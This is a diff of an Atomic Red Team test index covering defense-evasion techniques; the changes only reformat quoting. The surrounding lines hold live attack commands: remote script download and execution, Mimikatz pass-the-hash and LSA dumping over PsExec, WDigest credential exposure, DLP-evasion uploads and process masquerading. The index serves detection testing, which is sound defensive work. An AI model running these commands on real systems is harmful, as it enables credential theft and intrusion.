@@ -27277,7 +27277,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -27302,10 +27302,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -27348,7 +27348,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. -' + ' supported_platforms: - windows input_arguments: @@ -27373,10 +27373,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -27430,10 +27430,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" 
@@ -27615,7 +27615,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -27631,14 +27631,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -27654,14 +27654,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -27677,14 +27677,14 @@ defense-evasion: executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -27700,14 +27700,14 @@ defense-evasion: executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. -' + ' supported_platforms: - macos - linux 
@@ -27727,14 +27727,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. -' + ' supported_platforms: - macos - linux @@ -27754,13 +27754,13 @@ defense-evasion: executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. -' + ' supported_platforms: - macos - linux @@ -27776,13 +27776,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. -' + ' supported_platforms: - macos - linux @@ -27798,7 +27798,7 @@ defense-evasion: executor: command: 'chown -R #{owner} #{file_or_folder} -' + ' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f @@ -27816,7 +27816,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} -' + ' name: sh T1078.003: technique: @@ -27940,7 +27940,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. -' + ' supported_platforms: - windows input_arguments: 
@@ -27960,10 +27960,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) -' + ' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#(unknown)" @@ -27976,7 +27976,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. -' + ' supported_platforms: - windows input_arguments: @@ -27996,10 +27996,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) -' + ' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#(unknown)" @@ -28122,7 +28122,7 @@ defense-evasion: Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ -' + ' supported_platforms: - windows input_arguments: 
@@ -28134,20 +28134,20 @@ defense-evasion: dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) -' + ' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" -' + ' cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null -' + ' name: powershell - name: Mount an ISO image and run executable from the ISO auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc @@ -28169,10 +28169,10 @@ defense-evasion: dependencies: - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) -' + ' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" @@ -28259,7 +28259,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f -' + ' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc @@ -28274,7 +28274,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times -' + ' name: command_prompt elevation_required: true T1036: @@ -28424,7 +28424,7 @@ defense-evasion: description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) -' + ' supported_platforms: - macos - linux 
@@ -28673,11 +28673,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f -' + ' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify Registry of Local Machine - cmd @@ -28697,11 +28697,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f -' + ' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials @@ -28716,11 +28716,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f -' + ' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone @@ -28761,11 +28761,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "''" -' + ' name: command_prompt T1218.007: technique: @@ -29267,7 +29267,7 @@ defense-evasion: description: 'Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. -' + ' supported_platforms: - windows input_arguments: 
@@ -29279,17 +29279,17 @@ defense-evasion: dependencies: - description: 'T1218.msi must exist on disk at specified location (#{msi_payload}) -' + ' prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own MSI" -' + ' executor: command: 'msiexec.exe /q /i "#{msi_payload}" -' + ' name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 @@ -29297,7 +29297,7 @@ defense-evasion: in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. -' + ' supported_platforms: - windows input_arguments: @@ -29308,7 +29308,7 @@ defense-evasion: executor: command: 'msiexec.exe /q /i "#{msi_payload}" -' + ' name: command_prompt - name: Msiexec.exe - Execute Arbitrary DLL auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec @@ -29327,17 +29327,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'msiexec.exe /y "#{dll_payload}" -' + ' name: command_prompt T1564.004: technique: @@ -29477,7 +29477,7 @@ defense-evasion: Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore -' + ' name: powershell - name: Create ADS command prompt auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb 
@@ -29501,7 +29501,7 @@ defense-evasion: for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 -' + ' name: command_prompt - name: Create ADS PowerShell auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 @@ -29523,13 +29523,13 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'New-Item -Path #{file_name} | Out-Null -' + ' executor: command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" @@ -29537,7 +29537,7 @@ defense-evasion: set-content -path . -stream #{ads_filename} -value "test3" cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore -' + ' name: powershell T1599.001: technique: @@ -29746,7 +29746,7 @@ defense-evasion: auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 description: 'Add a Network Share utilizing the command_prompt -' + ' supported_platforms: - windows input_arguments: @@ -29763,7 +29763,7 @@ defense-evasion: auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222' description: 'Removes a Network Share utilizing the command_prompt -' + ' supported_platforms: - windows input_arguments: @@ -29774,13 +29774,13 @@ defense-evasion: executor: command: 'net share #{share_name} /delete -' + ' name: command_prompt - name: Remove Network Share PowerShell auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 description: 'Removes a Network Share utilizing PowerShell -' + ' supported_platforms: - windows input_arguments: 
@@ -29990,14 +29990,14 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} -' + ' name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: 'Mimic execution of compressed executable. When successfully executed, calculator.exe will open. -' + ' supported_platforms: - windows input_arguments: @@ -30009,11 +30009,11 @@ defense-evasion: dependencies: - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe -' + ' prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" @@ -30021,7 +30021,7 @@ defense-evasion: executor: command: '"%temp%\temp_T1027.zip\T1027.exe" -' + ' cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul @@ -30055,7 +30055,7 @@ defense-evasion: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' -Attachments #{input_file} -SmtpServer #{smtp_server} -' + ' name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 @@ -30076,7 +30076,7 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} -' + ' name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f @@ -30084,7 +30084,7 @@ defense-evasion: "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows executor: 
@@ -30095,7 +30095,7 @@ defense-evasion: 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) -' + ' name: powershell T1218.008: technique: @@ -30166,7 +30166,7 @@ defense-evasion: auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 description: 'Execute arbitrary DLL file stored locally. -' + ' supported_platforms: - windows input_arguments: @@ -30178,17 +30178,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} -' + ' name: command_prompt T1134.004: technique: @@ -30301,10 +30301,10 @@ defense-evasion: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -30345,7 +30345,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -30374,7 +30374,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' 
@@ -30404,7 +30404,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -30440,7 +30440,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -30525,7 +30525,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -30539,13 +30539,13 @@ defense-evasion: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" -' + ' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec -' + ' supported_platforms: - windows input_arguments: @@ -30574,18 +30574,18 @@ defense-evasion: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) -' + ' prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} -' + ' executor: command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} -' + ' name: command_prompt T1550.003: technique: @@ -30664,7 +30664,7 @@ defense-evasion: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos -' + ' supported_platforms: - windows input_arguments: 
@@ -30684,10 +30684,10 @@ defense-evasion: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" @@ -30765,7 +30765,7 @@ defense-evasion: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -30778,14 +30778,14 @@ defense-evasion: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -31616,13 +31616,13 @@ defense-evasion: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process -' + ' supported_platforms: - windows input_arguments: @@ -31634,7 +31634,7 @@ defense-evasion: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null 
@@ -31645,7 +31645,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -31768,7 +31768,7 @@ defense-evasion: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -31779,7 +31779,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -31814,7 +31814,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -31828,10 +31828,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -31842,7 +31842,7 @@ defense-evasion: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -31977,7 +31977,7 @@ defense-evasion: description: 'Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. -' + ' supported_platforms: - windows input_arguments: 
@@ -31989,7 +31989,7 @@ defense-evasion: command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" -' + ' name: command_prompt T1542.004: technique: @@ -32212,7 +32212,7 @@ defense-evasion: description: 'Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn''t really execute either." will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -32229,10 +32229,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) -' + ' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -32242,7 +32242,7 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Regsvcs Uninstall Method Call Test auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 @@ -32265,10 +32265,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) -' + ' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -32357,7 +32357,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: 
@@ -32377,10 +32377,10 @@ defense-evasion: dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#(unknown)) -' + ' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#(unknown)" @@ -32415,7 +32415,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -32436,10 +32436,10 @@ defense-evasion: - description: 'AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) -' + ' prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" @@ -32447,14 +32447,14 @@ defense-evasion: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) -' + ' name: command_prompt - name: Regsvr32 Registering Non DLL auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 description: 'Replicating observed Gozi maldoc behavior registering a dll with an altered extension -' + ' supported_platforms: - windows input_arguments: @@ -32474,13 +32474,13 @@ defense-evasion: dependencies: - description: 'Test requires a renamed dll file -' + ' prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 ) -' + ' get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}" -' + ' executor: name: command_prompt elevation_required: false 
@@ -32596,7 +32596,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading as Linux crond process. auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 @@ -32612,7 +32612,7 @@ defense-evasion: /tmp/crond cleanup_command: 'rm /tmp/crond -' + ' name: sh - name: Masquerading - cscript.exe running as notepad.exe auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 @@ -32628,7 +32628,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - wscript.exe running as svchost.exe auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 @@ -32644,7 +32644,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - powershell.exe running as taskhostw.exe auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa @@ -32660,7 +32660,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - non-windows exe running as windows exe auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 @@ -32683,10 +32683,10 @@ defense-evasion: dependencies: - description: 'Exe file to copy must exist on disk at specified location (#{inputfile}) -' + ' prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}" 
@@ -32697,14 +32697,14 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore -' + ' name: powershell - name: Masquerading - windows exe running as different windows exe auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe -' + ' supported_platforms: - windows input_arguments: @@ -32723,7 +32723,7 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore -' + ' name: powershell - name: Malicious process Masquerading as LSM.exe auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f @@ -33005,7 +33005,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -33018,10 +33018,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -33130,7 +33130,7 @@ defense-evasion: auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 description: 'Loadable Kernel Module based Rootkit -' + ' supported_platforms: - linux input_arguments: 
